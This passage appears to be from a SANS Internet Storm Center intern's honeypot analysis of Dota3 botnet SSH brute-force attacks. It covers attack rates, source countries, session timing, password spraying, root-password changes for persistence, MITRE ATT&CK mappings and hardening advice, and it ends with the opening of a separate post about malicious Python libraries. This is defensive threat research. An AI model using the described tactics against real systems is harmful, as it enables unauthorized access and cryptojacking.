Once I had something to look for, I needed to find the ‘When’, or the period between the first and last detected instances of this attack sequence in the logs. This will help me get my arms around the data I need from the event to produce a more complete analysis. I continued to find instances of this attack sequence as I searched through older log files.  In my honeypot I was able to set the start date to 10 June 2024 and the end date to 11 August 2024 (the date I was doing my analysis; these attacks continue to this day).  This would reflect my local ‘How Long’ period as well, at least from my honeypot’s perspective.  Knowing this date range is a key detail necessary to identify the scope of the activity.

Who | What | When | Where | Why | How | How Long

The earliest mention that I can find is that this variant of the Dota botnet was detected in December of 2019 [17], but there are conflicting reports with other sources listing an October 2021[13] identification date.  Not a conclusive answer, but in this case the How Long for this botnet’s existence could be between 3 and 5 years.

Who | What | When | Where | Why | How | How Long

The next steps are to continue analysis of the data to gain more understanding about the scope and scale of the operation and try to identify aspects of ‘how’ the actor works.  For instance, an interesting aspect of an incident is to understand if this is a manual process or if it is automated.  

There are a few attributes of an attack sequence that can help with this identification, namely:

  • The Volume or rate of activity occurring in a window of time, 
  • The Geographic locations of attacking systems (analyze the involved IP addresses, locations, reuse), and 
  • The Session Time or the length of an attack session compared to the complexity of the commands.  

From my perspective, my local ‘When’ and ‘How Long’ attributes allowed me to identify activity from over 10,000 probes. The logs showed 42% of the probes were initially unsuccessful. This activity resulted in a total of 5,873 successful SSH authentications to the honeypot that fit the same subsequent command sequence. Crunching the data (i.e., I used Python to isolate the data elements, Excel to do the math and create the graphics), the following attributes can be identified:

Volume: The volume / rate of successful authentications during the period of 10 June to 11 August (62 days) would be 5,873/62, or 94.73 incidents per day (one every 4 hours).  

Another way to evaluate the event frequency is to identify how many occur during a given hour over a period of time.  Think of each hour as a bucket, and for each day add the number of attacks for that hour to that ‘bucket’.  (This type of analysis is often used to analyze network traffic to identify potential ‘beaconing’, or command and control activity.) For this attack, after 62 days the hourly event distribution graph looks like:

For example, as shown in the chart above, the peak hour across the date range was 16:00UTC with 399 successful authentications, the ‘slowest hour is 22:00UTC with 131 authentications, and the average hourly event rate approaches 245. This trend indicates a 24×7 operation.

These findings (overall rate of attack and rate of attack per hour) are indications of an automated operation.

Who | What | When | Where | Why | How | How Long

Geographic Location: Next, I worked to find the number of systems used in the probe- and the country in which they are hosted.  The successful probes originated from 2,464 IP addresses in 94 different ISO codes.  This is another sign of an automated operation. As listing all 2,464 distinct IP addresses in this document would not be useful, this table shows the top 20 IP addresses by number of successful authentications from that address:

The data in the table above tends to show a distributed event due to the number of IP addresses used and the geographic range (ISO codes (countries)) over which the addresses are hosted. Many of the IP addresses appear only once in my honeypot logs. This is displayed graphically in the chart below (#IP addresses in the ‘Y’ axis vs # times used in the ‘X’ axis):

I mentioned earlier that the probes originated from 94 different ISO codes (countries) [18]. The table below displays the top 20 hosting countries.  The countries in this list hosted the systems responsible for 88% of all attack sessions:

Excel has many graphs to help display and convey information visually. I tried and rejected different attempts, including bar charts, line charts, and the usually reliable pie chart. I found that I could not clearly convey this information using those standard charts.  Thinking about the worldwide aspect of this dataset led me to try to figure out how to create a graph from a map.  Three minutes with a search engine [19] and another four minutes with Excel helped create this suitable-for-framing chart that helps illustrate the global nature of the attacks:

Of the 249 countries, territories, or areas of geographical interest [18] with ISO codes, 38% show up in my dataset and are highlighted in the chart above.

Session time:  The approach I took was to analyze the amount of time each attack took from the point of authentication to the end of the command sequence.  The session time is easy to calculate, but I also wanted to obtain a measure of the amount of work completed by the actor during each session. A lot of keypresses during a short amount of time would indicate that there is automation being employed. There are some practical challenges with this approach that I will call out below.

  • Session Time = Session end time – Session start time in seconds (s)   
  • Command sequence: 1103 characters (c) (13 logon + 1088 ‘command’ characters).  
  • From a worldwide perspective 
    • The average session time was 18.49s 
    • Maximum session time of 182.5s, Minimum length of 6.1s. 
    • 1103c / 18.49s per session = 59 cps (characters per second)
    • 59cps ~= 720 words per minute
  • From a US-based IP address:
    • The average session time was 14.19s 
    • Maximum session time of 112.2s, Minimum length of 6.1s
    • 1103c / 14.19s per session = 74 cps
    • 74 cps ~= 888 words per minute

In graphical form (using Excel) the difference between the US-based attacks and worldwide attacks is displayed below; you can nearly see the US average of 14.19s in the chart on the left vs the world average of 18.49s in the chart on the right as a virtual horizontal line denoting those averages in each graph:

As noted above, this process is not entirely accurate; there are external factors that impact the measurement.  For instance, the amount of time it takes for the honeypot to process and respond to the command, the processing capacity of different source devices, and the variability in the network ‘speed’ between the actor and the victim are not taken into account with this process. 

Leaving those issues aside for a moment, these results still show that the attacks were automated; the data shows the ‘typist’ was working at speeds exceeding 720 words/minute.  If the three impacting factors mentioned above are taken into account, the typing rate (in words per minute) would increase.

The conclusion drawn (from a Volume, Geographic Dispersion, and Session Timing perspective) also supports a conclusion that this is an automated activity.  The scale of the event (number of IP addresses, number of host countries) further indicates that this is likely a botnet operated by a threat actor group; it would take more effort to collect and maintain a fleet of bots this size than one person could be expected to support.

Other interesting aspects of the event I decided to investigate are the accounts targeted, the variety in the types of passwords used to authenticate, and an analysis of the new passwords used to secure the root account. 

In this case, the event targeted the root account most often (99.5%) [j].  A small number of user accounts were targeted by the actor at a much lower rate: 

  • ‘roots’, 
  • ‘root1’, 
  • ‘root2’, 
  • ‘webroot’, and 
  • ‘root01’.

While probing the system the actor used 1,314 unique passwords to authenticate using SSH [a]. Passwords were often reused when trying to initially authenticate, only 229 passwords were used one time.  This activity is consistent with an organized password-spray attack, using one password to try authentication against multiple targets in one ‘pass’ [k]. The password re-use graph (below) matches the general form of the IP address graph presented above; the number of reused passwords (‘Y’ axis) decreases with the number of usages (‘X’ axis):

The fourth step in the command sequence was an attempt by the actor to gain persistence on the device by changing the password of the system account to a new value.  Of the 5,873 password changes to the ‘root’ user account, 5,759 passwords were unique, re-using only 119 passwords.  The new password values had the same format; all were 12-character strings consisting of random uppercase, lowercase, and numeric characters [d].

Attack Observation Report Generation

At this point, all ‘W’ and follow-up questions have been identified, asked, and answered, and it is time to pull all of the collected information together to produce an Attack Observation report. This report includes a summary of observations using text, tables, and graphs (actor info, IoCs, command patterns, impact, Mitre techniques [20], proposed recovery steps) as well as information about mitigating controls that could be implemented to prevent future attacks. The report content is distilled down to ‘just the facts’, as the purpose of an Attack Observation report is to be more direct and focused than a blog post.  

You may find that the process of creating an Attack Observation report will raise additional questions that must be answered to arrive at a more complete ‘picture’. This is the iterative part of the analysis process I mentioned earlier.  Lather, rinse, repeat…

For this Attack Observation report

Who? – This command pattern has been reliably attributed as belonging to the ‘Dota3’ botnet [21], and the CounterCraft company has labeled the actor ‘CC0631’ [13], but very little about this threat actor is known at this time [i]. 

What? – The Dota3 botnet targets SSH servers with weak credentials.  The goal is to compromise the system, obtain persistence, and install malware on the device for malicious activities such as crypto mining of digital currency [17] [a] [b] [c] [d] [e] [f] [g] [j] [k].

Where? – This is a global event.  5,873 successful authentications/probes over 62 days using 2,464 distinct IP addresses (systems) hosted in 94 different countries. The scope and scale of the operation indicates that this is controlled by a threat group. General botnet activity is also on the rise globally [22] [i].

When? – The events started on 10 June 2024 and data through 11 August 2024 is included in the report.  

Why? – The ‘why’ is to specifically identify weak SSH servers, gain root access, obtain persistence, and install malware.  There are indications that this activity is related to mining crypto currency (crypto jacking) [13] [23] [h] [i].

How? – Is this an automated event, or is this a one-off manual effort?  To get this answer I review the various rates of attack, identify the locations participating in the probes, and inspect the different commands used.  This can help identify if this is an automated event or not and can also potentially shine a light on the actor.  Additionally, mitigating steps can be identified to block or deflect the malicious traffic. This activity was characterized as an organized, automated attack.

How Long? – Research uncovered that the Dota3 malware variant has been active since at least October of 2021 [13]; there are reports that move that date back to as early as December of 2019 [17].  Conservatively, the variant has been active for 3 years. As of this writing these attacks are still targeting my honeypot.
Prevention: Botnets will exist as long as the actor’s efforts: 

  • are financially lucrative, 
  • remain technically possible, and 
  • are not derailed by the incarceration.  
  • The operation of a botnet would be affected if one of those three items is changed.  

The information collected in this Attack Observation report can be used to prevent or to reduce the technical feasibility of future attacks.  

  • A list of potential controls could be compiled and provided to the company’s IT Architecture, Design, and Implementation teams to help them build preventative measures into projects.  Future systems and services will be deployed with a more secure architecture and configuration. 
  • Methods to detect a compromised device would be extremely useful as well; Security Operations staff could employ that information to identify, contain, and eradicate malicious actors from the company’s systems. 
  • Additionally, the company’s GRC (Governance, Risk, and Compliance) team can use these findings when reviewing the company’s control library, either adding new controls or ensuring that existing controls are applied where appropriate.  Future audits can be completed to help the company manage operational risk.

Conclusion:  This is a preventable attack.  Systems with strong password controls would not be susceptible to this activity.  If we were in a corporate environment, the next steps would be to:

1.    Identify security gaps.
2.    Plan to evaluate all IoT devices that are accessible from the Internet.  
3.    Log into each device.

  • If you cannot log into the device, schedule a replacement or closer inspection for the system; it may be compromised.
    • When deploying the replacement device, ensure that it is sufficiently protected from remote authentication attacks.
  • If you can log into the device, implement controls to improve the configuration hygiene and secure the device.
    • Ensure that at a minimum the passwords are unique per device and ‘strong’ enough.

4.    Repeat until complete.
5.    Report findings to the appropriate groups.
6.    Implement a practice to periodically audit these systems to ensure that any compromised devices are identified and recovery steps are taken.

In this case eleven security (hygiene) controls that can be implemented to reduce IoT attacks:

1.    Do not expose unprotected IoT devices to the Internet. If it isn’t accessible, it can’t be assimilated.
2.    Implement IoT devices behind a bastion host [24] or a firewall.
3.    Restrict logon access to known IP addresses, ports, and protocols with filtering rules on the firewall or router.
4.    Implement VPN access to your systems with strong passphrases and multifactor authentication.
5.    Ensure that IoT systems are patched and software is up to date [25].
6.    Ensure that the device has a secure configuration.
7.    Do not allow privileged accounts (i.e., root) to have SSH access.
8.    Do not use simple passphrases for SSH authentication, utilize public/private authentication keys with a passphrase
9.    Ensure that passphrases are long and are strong (comprised of (at least seemingly) random characters).
10.    Do not re-use passwords across devices.
11.    Monitor IoT devices.

Summary

It is now time to close a loop and explain the title of this article (“Hygiene, Hygiene, Hygiene”). 

The old joke “What are the three most important things to know about real estate? Answer:  Location, Location, Location!” could be modified and applied to this situation: “What are the three most important steps to take to protect my systems? The answer to that question is: Hygiene, Hygiene, Hygiene!”.  The new joke works as well as the original; the ‘corniness’ is maintained and the answer provides a hint of the solution.  

In a perfect world, the ‘Hygiene’ process begins with a threat assessment, the results of which are integrated into project planning and design phases.  Pilot systems are built and tested, issues are identified and solutions are fed back into the design process. During the deployment phase of the project tests are performed and systems are monitored to ensure that the product remains true to the plan.  After deployment is complete, the operational system is periodically subjected to monitoring, auditing, testing, and adjustments are made as necessary.  This approach is difficult, takes time, and increases project cost, which are all reasons our systems are vulnerable to botnets today.

Since we are often not in a perfect world we often must circle back and apply hardening (hygiene) changes to in-production systems.  This process is not inexpensive nor easy to do, but if even a few improvements can be made the system will be less likely to fall to compromise.  

There is a relationship between the answer to that original joke (i.e., ‘Location’) and a concern I had related to satisfying the requirements of the ISC Internship. I was concerned that the Internet that serviced my little corner of the world was somehow as secluded as it was geographically, which would make it difficult to complete the assignments. That has not been the case. Another valuable lesson from this experience is that there are no hidden corners of the Internet. In real life, newly connected devices are discovered within a few minutes, and poorly protected systems (i.e., low-hanging fruit) are often compromised a few minutes later. 

The ISC Internship is an intensive experience. In the end, as with any meaningful undertaking, you get out of it what you put into it. I have learned a lot about configuration hygiene, IoT weaknesses, data analysis, tool development / scripting, and have a deeper appreciation for the work that goes in analyzing an incident and creating an attack observation report.  I can’t think of a better way to gain this experience; this Internship provides an opportunity to roll up your sleeves and dig in.

Identified Mitre ATT&CK Techniques

[a] Mitre ATT&CK: Brute Force.Password Guessing (T1110.001) – Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. [23]
[b] Mitre ATT&CK: Command and Scripting.Unix Shell (T1059.004) – Adversaries may abuse Unix shell commands and scripts for execution. [23]
[c] Mitre ATT&CK: Account Manipulation.SSH Authorized Keys (T1098.004) – Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. [23]
[d] Mitre ATT&CK: Account Manipulation (T1098) – Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.[1] These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. [23]
[e] Mitre ATT&CK: Indicator Removal. File Deletion (T1070.004) – Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. [23]
[f] Mitre ATT&CK: System Information Discovery (T1082) – An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. [23]
[g] Mitre ATT&CK: System Service Discovery (T1007) – Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl –type=service, and net start. [23]
[h] Mitre ATT&CK: Resource Hijacking (T1496) – Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. [23]
[i] Mitre ATT&CK: Compromise Infrastructure.Botnet (T1584.008) – Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not Initial Access to that environment — instead leveraging these devices to support additional targeting. [23]
[j] Mitre ATT&CK: Valid Accounts.Local Accounts (T1078.003) – Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. [23]
[k] Mitre ATT&CK: Brute Force.Password Spraying (T1110.003) – Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.

[1] sans.edu Internet Storm Center – SANS Internet Storm Center
[2] Rumsfeld Matrix (theuncertaintyproject.org)
[3] Submit Your Firewall Logs – SANs Internet Storm Center
[4] JSON To CSV Converter (convertcsv.com)
[5] JSON to CSV – CSVJSON
[6] VirusTotal – Home
[7] Joe Sandbox
[8] Shodan Search Engine
[9] Mitre ATT&CK
[10] Five Ws – Wikipedia
[11] secure linux/secure.sh
[12] VirusTotal – File
[13] Dota3 Malware Again and Again | CounterCraft (countercraftsec.com)
[14] Assimilation | Memory Alpha | Fandom
[15] Cryptojacking – What is it, and how does it work? | Malwarebytes
[16] XMRig
[17] Dota3: Is your Internet of Things device moonlighting? | Official Juniper Networks Blogs
[18] List of ISO 3166 country codes – Wikipedia
[19] Create a Map chart in Excel – Microsoft Support
[20] Tactics – Enterprise | MITRE ATT&CK®
[21] blog.port22.dk
[22] 15+ Shocking Botnet Statistics and Facts for 2024 (comparitech.com)
[23] Global Threat Intelligence Report April (blackberry.com)
[24] Bastion host – Wikipedia
[25] A Look Back at the Top 12 IoT Exploits of 2021 (Part 1) (finitestate.io)
[26] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Python Libraries Used for Malicious Purposes, (Wed, Sep 11th)

This post was originally published on this site

Since I’m interested in malicious Python scripts, I found multiple samples that rely on existing libraries. The most-known repository is probably pypi.org[1] that reports, as of today, 567,478 projects! Malware developers are like regular developers: They don’t want to reinvent the wheel and make their shopping across existing libraries to expand their scripts capabilities.